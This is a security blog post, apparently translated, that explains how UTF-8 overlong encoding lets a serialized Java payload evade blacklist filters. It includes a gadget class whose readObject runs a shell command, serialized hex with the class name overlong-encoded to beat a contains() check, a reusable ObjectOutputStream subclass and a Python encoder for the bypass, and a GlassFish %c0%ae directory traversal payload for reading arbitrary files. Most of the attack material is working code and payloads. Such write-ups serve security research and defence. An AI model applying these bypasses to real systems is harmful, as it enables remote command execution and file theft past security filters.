Preface

These notes record the security problems caused by UTF-8 overlong encoding.

References: 1ue, lzstar.

UTF-8

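UTF-8 is a variable-length encoding. It uses 1 to 4 bytes to represent a symbol, and the byte length depends on the symbol.

UTF-8 encoding rules:

  • For a single-byte symbol, the first bit is 0 and the remaining 7 bits hold the symbol's Unicode code point. For English letters, UTF-8 is therefore identical to ASCII.
  • For an n-byte symbol (n > 1), the first n bits of the first byte are 1, bit n + 1 is 0, and every following byte starts with the two bits 10. All remaining bits hold the symbol's Unicode code point.

An overlong encoding stores a code point in more bytes than its shortest form needs, for example an ASCII character written in the two-byte layout. The UTF-8 standard forbids this, but a decoder that does not check for the shortest form still accepts it.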
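The rules above can be sketched in Python. The helper name `utf8_encode` is made up for this illustration; it builds the bytes by hand from a code point and compares the result with Python's built-in `str.encode`. It assumes a valid, non-surrogate code point.

```python
def utf8_encode(cp: int) -> bytes:
    """Encode one Unicode code point following the UTF-8 bit layout."""
    if cp < 0x80:        # 1 byte:  0xxxxxxx
        return bytes([cp])
    if cp < 0x800:       # 2 bytes: 110xxxxx 10xxxxxx
        return bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
    if cp < 0x10000:     # 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (cp >> 12),
                      0x80 | ((cp >> 6) & 0x3F),
                      0x80 | (cp & 0x3F)])
    # 4 bytes: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
    return bytes([0xF0 | (cp >> 18),
                  0x80 | ((cp >> 12) & 0x3F),
                  0x80 | ((cp >> 6) & 0x3F),
                  0x80 | (cp & 0x3F)])


if __name__ == "__main__":
    for ch in ("o", "\u00e9", "\u4e2d", "\U0001F600"):
        encoded = utf8_encode(ord(ch))
        # The hand-built bytes should match the standard encoder.
        assert encoded == ch.encode("utf-8")
        print(hex(ord(ch)), encoded.hex())
```

Each branch picks the shortest layout that fits the code point, which is exactly the property an overlong encoding violates.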

Analysis

Suppose there is a malicious class like the following:

package org.zIxyd;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class Calc implements Serializable {

    private String cmd;

    public Calc() {
    }

    public Calc(String cmd) {
        this.cmd = cmd;
    }

    // Called automatically during deserialization; runs the stored command.
    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        Runtime.getRuntime().exec(this.cmd);
    }
}

If some code path deserializes this class, the result is arbitrary command execution:

package org.zIxyd;

import java.io.*;

public class ExpTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        Calc calc = new Calc("calc");

        // Serialize the malicious object into a byte array.
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
        oos.writeObject(calc);

        String string = byteArrayOutputStream.toString();
        System.out.println(string);

        BytetoHex(byteArrayOutputStream.toByteArray());

        // Blacklist check: refuse to deserialize if the class name appears in the data.
        if (!string.contains("org.zIxyd.Calc")) {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
            ois.readObject();
        } else {
            System.out.println("Hacker!!!");
        }
    }

    // Print the bytes as an uppercase hex string.
    public static void BytetoHex(byte[] bytes) {
        StringBuilder hexString = new StringBuilder();
        for (byte b : bytes) {
            hexString.append(String.format("%02X", b));
        }
        System.out.println(hexString.toString());
    }
}

/*
Output:
�� sr org.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
ACED00057372000E6F72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63
Hacker!!!
*/

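However, this code is guarded by a WAF-style blacklist: !string.contains("org.zIxyd.Calc").

As the output shows, normally serialized data contains the class name in plain form.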
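To see where the class name sits in the stream, here is a minimal Python sketch that reads it out of the hex dump printed above. The function name `read_class_name` is made up for this example, and it only handles the simple layout seen here: stream header, then TC_OBJECT (0x73), then TC_CLASSDESC (0x72), then a 2-byte big-endian length followed by the name bytes.

```python
import struct

# Hex dump printed by ExpTest above.
STREAM_HEX = "ACED00057372000E6F72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63"


def read_class_name(stream: bytes) -> str:
    """Return the class name of the first class descriptor in the stream."""
    magic, version = struct.unpack(">HH", stream[:4])
    if magic != 0xACED or version != 5:
        raise ValueError("not a Java serialization stream")
    if stream[4] != 0x73 or stream[5] != 0x72:  # TC_OBJECT, TC_CLASSDESC
        raise ValueError("unexpected layout for this sketch")
    (name_len,) = struct.unpack(">H", stream[6:8])
    # Plain ASCII here; a blacklist on the raw bytes matches exactly this span.
    return stream[8:8 + name_len].decode("ascii")


if __name__ == "__main__":
    print(read_class_name(bytes.fromhex(STREAM_HEX)))  # org.zIxyd.Calc
```

The length field 000E (14) is followed by the 14 bytes of org.zIxyd.Calc, which is why a substring check on the raw data finds it.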

Next, step through deserialization in a debugger to see how it obtains the class name. 1ue has already given the call stack:

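ObjectStreamClass#readNonProxy(ObjectInputStream in)
ObjectInputStream#readUTF()
ObjectInputStream$BlockDataInputStream#readUTF()
ObjectInputStream$BlockDataInputStream#readUTFBody(long utflen)
ObjectInputStream$BlockDataInputStream#readUTFSpan(StringBuilder sbuf, long utflen)

The decoding finally happens in readUTFSpan, a method of BlockDataInputStream, the inner class of ObjectInputStream: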

private long readUTFSpan(StringBuilder sbuf, long utflen)
    throws IOException
{
    int cpos = 0;
    int start = pos;
    int avail = Math.min(end - pos, CHAR_BUF_SIZE);
    // stop short of last char unless all of utf bytes in buffer
    int stop = pos + ((utflen > avail) ? avail - 2 : (int) utflen);
    boolean outOfBounds = false;

    try {
        while (pos < stop) {
            int b1, b2, b3;
            b1 = buf[pos++] & 0xFF;
            switch (b1 >> 4) {
                case 0:
                case 1:
                case 2:
                case 3:
                case 4:
                case 5:
                case 6:
                case 7:   // 1 byte format: 0xxxxxxx
                    cbuf[cpos++] = (char) b1;
                    break;

                case 12:
                case 13:  // 2 byte format: 110xxxxx 10xxxxxx
                    b2 = buf[pos++];
                    if ((b2 & 0xC0) != 0x80) {
                        throw new UTFDataFormatException();
                    }
                    cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
                                           ((b2 & 0x3F) << 0));
                    break;

                case 14:  // 3 byte format: 1110xxxx 10xxxxxx 10xxxxxx
                    b3 = buf[pos + 1];
                    b2 = buf[pos + 0];
                    pos += 2;
                    if ((b2 & 0xC0) != 0x80 || (b3 & 0xC0) != 0x80) {
                        throw new UTFDataFormatException();
                    }
                    cbuf[cpos++] = (char) (((b1 & 0x0F) << 12) |
                                           ((b2 & 0x3F) << 6) |
                                           ((b3 & 0x3F) << 0));
                    break;

                default:  // 10xx xxxx, 1111 xxxx
                    throw new UTFDataFormatException();
            }
        }
    } catch (ArrayIndexOutOfBoundsException ex) {
        outOfBounds = true;
    } finally {
        if (outOfBounds || (pos - start) > utflen) {
            pos = start + (int) utflen;
            throw new UTFDataFormatException();
        }
    }

    sbuf.append(cbuf, 0, cpos);
    return pos - start;
}

The method uses switch (b1 >> 4), the top four bits of the first byte, to decide how many bytes make up one character.
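To make the branch selection easier to follow, here is a Python sketch that mirrors the same switch. It is a simplified model, not the JDK code: the function name `decode_like_read_utf_span` is made up, buffering is left out, and malformed input raises `ValueError` instead of `UTFDataFormatException`.

```python
def decode_like_read_utf_span(data: bytes) -> str:
    """Decode bytes with the same per-branch bit arithmetic as readUTFSpan."""
    out = []
    pos = 0
    while pos < len(data):
        b1 = data[pos]
        pos += 1
        kind = b1 >> 4
        if kind <= 7:                       # 1 byte: 0xxxxxxx
            out.append(chr(b1))
        elif kind in (12, 13):              # 2 bytes: 110xxxxx 10xxxxxx
            if pos + 1 > len(data):
                raise ValueError("truncated 2-byte sequence")
            b2 = data[pos]
            pos += 1
            if (b2 & 0xC0) != 0x80:
                raise ValueError("bad continuation byte")
            out.append(chr(((b1 & 0x1F) << 6) | (b2 & 0x3F)))
        elif kind == 14:                    # 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx
            if pos + 2 > len(data):
                raise ValueError("truncated 3-byte sequence")
            b2, b3 = data[pos], data[pos + 1]
            pos += 2
            if (b2 & 0xC0) != 0x80 or (b3 & 0xC0) != 0x80:
                raise ValueError("bad continuation byte")
            out.append(chr(((b1 & 0x0F) << 12) | ((b2 & 0x3F) << 6) | (b3 & 0x3F)))
        else:                               # 10xxxxxx or 1111xxxx
            raise ValueError("unsupported lead byte")
    return "".join(out)


if __name__ == "__main__":
    print(decode_like_read_utf_span(b"org"))        # org
    print(decode_like_read_utf_span(b"\xc3\xa9"))   # the 2-byte branch, U+00E9
```

Note that no branch checks whether the decoded value could have been written in fewer bytes; each one only validates the continuation-byte prefix.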

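My class name here is org.zIxyd.Calc. Its first character is o, which is 0x6f in hexadecimal.

Following the code, 0x6f >> 4 is 6, so execution reaches the branch that treats one byte as one character and yields the char o: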

case 7:   // 1 byte format: 0xxxxxxx
    cbuf[cpos++] = (char) b1;
    break;

But is the 1-byte format 0xxxxxxx the only way to obtain the character o? Not at all: both the two-byte branch and the three-byte branch can produce it as well.

case 12:
case 13:  // 2 byte format: 110xxxxx 10xxxxxx
    b2 = buf[pos++];
    if ((b2 & 0xC0) != 0x80) {
        throw new UTFDataFormatException();
    }
    cbuf[cpos++] = (char) (((b1 & 0x1F) << 6) |
                           ((b2 & 0x3F) << 0));
    break;

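Take the two-byte case as the example. The following Python script brute-forces every two-byte sequence and prints the byte pair that decodes to each letter: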

import string

# Walk every lead byte 110xxxxx and every continuation byte 10xxxxxx.
b1 = int("11000000", 2)
while b1 <= int("11011111", 2):
    b2 = int("10000000", 2)
    while b2 <= int("10111111", 2):
        # Same bit arithmetic as the 2-byte branch of readUTFSpan.
        cha = chr(((b1 & 0x1F) << 6) | ((b2 & 0x3F) << 0))
        if cha in string.ascii_lowercase:
            print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
        if cha in string.ascii_uppercase:
            print(cha + " " + str(hex(b1)) + " : " + str(hex(b2)))
        b2 = b2 + 1
    b1 = b1 + 1

The output shows that o corresponds to 0xc1 : 0xaf.
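The three-byte branch is not worked through in this post, so here is a small sketch for completeness. The function names `overlong3` and `decode3` are made up for this example; `decode3` repeats the bit arithmetic of the 3-byte branch of readUTFSpan, and `overlong3` simply inverts it for a code point below 0x80.

```python
def overlong3(c: int) -> bytes:
    """Three-byte layout 1110xxxx 10xxxxxx 10xxxxxx for a small code point."""
    return bytes([0xE0 | (c >> 12),
                  0x80 | ((c >> 6) & 0x3F),
                  0x80 | (c & 0x3F)])


def decode3(b1: int, b2: int, b3: int) -> int:
    """Same expression as the 3-byte branch of readUTFSpan."""
    return ((b1 & 0x0F) << 12) | ((b2 & 0x3F) << 6) | (b3 & 0x3F)


if __name__ == "__main__":
    encoded = overlong3(ord("o"))
    print(encoded.hex())              # e081af
    print(chr(decode3(*encoded)))     # o
```

So for the same character there are three byte sequences the decoder accepts: 6f, c1 af and e0 81 af.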

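Now take the malicious serialized hex data from before, change the 6F at the start of the class name to C1AF, and deserialize the data again.

Note that the class name is now one byte longer, so its length field must change as well (000E becomes 000F).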
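The manual patch can be sketched in Python as follows. The function name `patch_first_char` is made up for this example, and the offsets assume the simple layout of this particular stream: 4 header bytes, 0x73, 0x72, then the 2-byte length and the class name.

```python
# Hex dump of the normally serialized Calc object from earlier in the post.
ORIGINAL_HEX = "ACED00057372000E6F72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63"


def patch_first_char(stream: bytes) -> bytes:
    """Rewrite the first class-name byte as a 2-byte overlong form and fix the length."""
    header, rest = stream[:6], stream[6:]
    name_len = int.from_bytes(rest[:2], "big")
    name, tail = rest[2:2 + name_len], rest[2 + name_len:]
    first = name[0]
    new_name = bytes([0xC0 | (first >> 6), 0x80 | (first & 0x3F)]) + name[1:]
    # The length prefix counts bytes, so it grows by one.
    return header + len(new_name).to_bytes(2, "big") + new_name + tail


if __name__ == "__main__":
    patched = patch_first_char(bytes.fromhex(ORIGINAL_HEX))
    print(patched.hex().upper())
    # The raw bytes no longer contain the blacklisted name.
    print(b"org.zIxyd.Calc" in patched)   # False
```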

package org.zIxyd;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class CalcTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException {

        // Length field changed from 000E to 000F, first class-name byte 6F replaced by C1AF.
        String hexString = "ACED00057372000FC1AF72672E7A497879642E43616C63BCF254BC9C48297C0200014C0003636D647400124C6A6176612F6C616E672F537472696E673B787074000463616C63";

        byte[] bytes = hexStringToByteArray(hexString);
        String text = new String(bytes);

        System.out.println("Decoded string: " + text);
        // Same blacklist check as before.
        if (!text.contains("org.zIxyd.Calc")) {
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
            ois.readObject();
        } else {
            System.out.println("Hacker!!!");
        }
    }

    // Convert a hex string to bytes without depending on javax.xml.bind.
    public static byte[] hexStringToByteArray(String hexString) {
        int len = hexString.length();
        byte[] data = new byte[len / 2];
        for (int i = 0; i < len; i += 2) {
            data[i / 2] = (byte) ((Character.digit(hexString.charAt(i), 16) << 4)
                    + Character.digit(hexString.charAt(i + 1), 16));
        }
        return data;
    }
}

/*
Output:
Decoded string: �� sr ��rg.zIxyd.Calc��T��H)| L cmdt Ljava/lang/String;xpt calc
*/

As the output shows, the o character has been obfuscated, so the blacklist no longer matches and is bypassed.

Tools

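That completes the vulnerability analysis, but editing the class name bytes by hand is too tedious. The approach others use is to override the writeClassDescriptor method and add logic that overlong-encodes the class name (see lzstar's write-up for the details).

I then read the comments, which pointed out that overriding writeUTF is simpler by comparison (it really is much simpler), which led to the code below: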

import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.HashMap;

public class OverlongExp extends ObjectOutputStream {

    // Precomputed two-byte overlong forms for characters common in class names.
    private static HashMap<Character, int[]> map;
    static {
        map = new HashMap<>();
        map.put('.', new int[]{0xc0, 0xae});
        map.put(';', new int[]{0xc0, 0xbb});
        map.put('$', new int[]{0xc0, 0xa4});
        map.put('[', new int[]{0xc1, 0x9b});
        map.put(']', new int[]{0xc1, 0x9d});
        map.put('_', new int[]{0xc1, 0x9f});
        map.put('a', new int[]{0xc1, 0xa1});
        map.put('b', new int[]{0xc1, 0xa2});
        map.put('c', new int[]{0xc1, 0xa3});
        map.put('d', new int[]{0xc1, 0xa4});
        map.put('e', new int[]{0xc1, 0xa5});
        map.put('f', new int[]{0xc1, 0xa6});
        map.put('g', new int[]{0xc1, 0xa7});
        map.put('h', new int[]{0xc1, 0xa8});
        map.put('i', new int[]{0xc1, 0xa9});
        map.put('j', new int[]{0xc1, 0xaa});
        map.put('k', new int[]{0xc1, 0xab});
        map.put('l', new int[]{0xc1, 0xac});
        map.put('m', new int[]{0xc1, 0xad});
        map.put('n', new int[]{0xc1, 0xae});
        map.put('o', new int[]{0xc1, 0xaf});
        map.put('p', new int[]{0xc1, 0xb0});
        map.put('q', new int[]{0xc1, 0xb1});
        map.put('r', new int[]{0xc1, 0xb2});
        map.put('s', new int[]{0xc1, 0xb3});
        map.put('t', new int[]{0xc1, 0xb4});
        map.put('u', new int[]{0xc1, 0xb5});
        map.put('v', new int[]{0xc1, 0xb6});
        map.put('w', new int[]{0xc1, 0xb7});
        map.put('x', new int[]{0xc1, 0xb8});
        map.put('y', new int[]{0xc1, 0xb9});
        map.put('z', new int[]{0xc1, 0xba});
        map.put('A', new int[]{0xc1, 0x81});
        map.put('B', new int[]{0xc1, 0x82});
        map.put('C', new int[]{0xc1, 0x83});
        map.put('D', new int[]{0xc1, 0x84});
        map.put('E', new int[]{0xc1, 0x85});
        map.put('F', new int[]{0xc1, 0x86});
        map.put('G', new int[]{0xc1, 0x87});
        map.put('H', new int[]{0xc1, 0x88});
        map.put('I', new int[]{0xc1, 0x89});
        map.put('J', new int[]{0xc1, 0x8a});
        map.put('K', new int[]{0xc1, 0x8b});
        map.put('L', new int[]{0xc1, 0x8c});
        map.put('M', new int[]{0xc1, 0x8d});
        map.put('N', new int[]{0xc1, 0x8e});
        map.put('O', new int[]{0xc1, 0x8f});
        map.put('P', new int[]{0xc1, 0x90});
        map.put('Q', new int[]{0xc1, 0x91});
        map.put('R', new int[]{0xc1, 0x92});
        map.put('S', new int[]{0xc1, 0x93});
        map.put('T', new int[]{0xc1, 0x94});
        map.put('U', new int[]{0xc1, 0x95});
        map.put('V', new int[]{0xc1, 0x96});
        map.put('W', new int[]{0xc1, 0x97});
        map.put('X', new int[]{0xc1, 0x98});
        map.put('Y', new int[]{0xc1, 0x99});
        map.put('Z', new int[]{0xc1, 0x9a});
    }

    public OverlongExp(OutputStream out) throws IOException {
        super(out);
    }

    @Override
    public void writeUTF(String str) throws IOException {
        // Every char is written as two bytes, so the length prefix is twice the char count.
        writeShort(str.length() * 2);
        for (int i = 0; i < str.length(); i++) {
            char c = str.charAt(i);
            int[] bs = map.get(c);
            if (bs == null) {
                // Not in the table (for example a digit): compute the two-byte form directly.
                // The two-byte layout only holds code points up to 0x7FF.
                if (c > 0x7FF) {
                    throw new IOException("character does not fit in two bytes: " + (int) c);
                }
                bs = new int[]{0xC0 | (c >> 6), 0x80 | (c & 0x3F)};
            }
            super.write(bs[0]);
            super.write(bs[1]);
        }
    }
}
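To check what bytes such a writeUTF override emits for a given name, the same logic can be modelled in a few lines of Python. This is only a sketch for inspecting the output, with the made-up function name `write_utf_overlong`; it assumes an ASCII-only input, as class names typically are.

```python
import struct


def write_utf_overlong(s: str) -> bytes:
    """Model of the override: 2-byte big-endian length, then 2 bytes per char."""
    body = bytearray()
    for ch in s:
        c = ord(ch)
        if c >= 0x80:
            raise ValueError("this sketch only handles ASCII input")
        body.append(0xC0 | (c >> 6))     # lead byte 110000xx
        body.append(0x80 | (c & 0x3F))   # continuation byte 10xxxxxx
    return struct.pack(">H", len(body)) + bytes(body)


if __name__ == "__main__":
    print(write_utf_overlong("Calc").hex())   # 0008c183c1a1c1acc1a3
```

The length prefix is 0008 because the four characters of Calc now occupy eight bytes.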

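Compare CC5 before and after obfuscation.

Summary

The security problems caused by overlong encoding are not limited to Java deserialization. For example, when decoding URLs, GlassFish did not account for UTF-8 overlong encoding attacks, so it parsed %c0%ae as the ASCII character . (dot). Using %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ to move up the directory tree achieves directory traversal and arbitrary file read.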
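The difference between a strict and a lenient decoder can be shown with a short Python sketch. It does not reproduce GlassFish's code; `lenient_decode` is a made-up function that models a decoder without the shortest-form check, while Python's built-in UTF-8 decoder serves as the strict one.

```python
from urllib.parse import unquote_to_bytes


def lenient_decode(raw: bytes) -> str:
    """Decode 1- and 2-byte sequences without rejecting overlong forms."""
    out = []
    i = 0
    while i < len(raw):
        b1 = raw[i]
        if b1 < 0x80:
            out.append(chr(b1))
            i += 1
        elif (b1 & 0xE0) == 0xC0 and i + 1 < len(raw) and (raw[i + 1] & 0xC0) == 0x80:
            out.append(chr(((b1 & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("sequence not handled by this sketch")
    return "".join(out)


def strict_is_valid(raw: bytes) -> bool:
    """Python's UTF-8 codec rejects overlong sequences such as C0 AE."""
    try:
        raw.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


if __name__ == "__main__":
    raw = unquote_to_bytes("%c0%ae%c0%ae/")
    print(lenient_decode(raw))     # ../
    print(strict_is_valid(raw))    # False
```

A filter that looks for ../ in the percent-encoded or raw form never sees it, while the lenient decoder behind the filter reconstructs it.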

Finally, here is a simple Python function written by P神 that converts an ASCII string into its overlong UTF-8 encoding:

def convert_int(i: int) -> bytes:
    # Spread the code point over the two-byte layout 110xxxxx 10xxxxxx.
    b1 = ((i >> 6) & 0b11111) | 0b11000000
    b2 = (i & 0b111111) | 0b10000000
    return bytes([b1, b2])


def convert_str(s: str) -> bytes:
    bs = b''
    for ch in s.encode():
        bs += convert_int(ch)

    return bs


if __name__ == '__main__':
    print(convert_str('.'))  # b'\xc0\xae'
    print(convert_str('org.example.Evil'))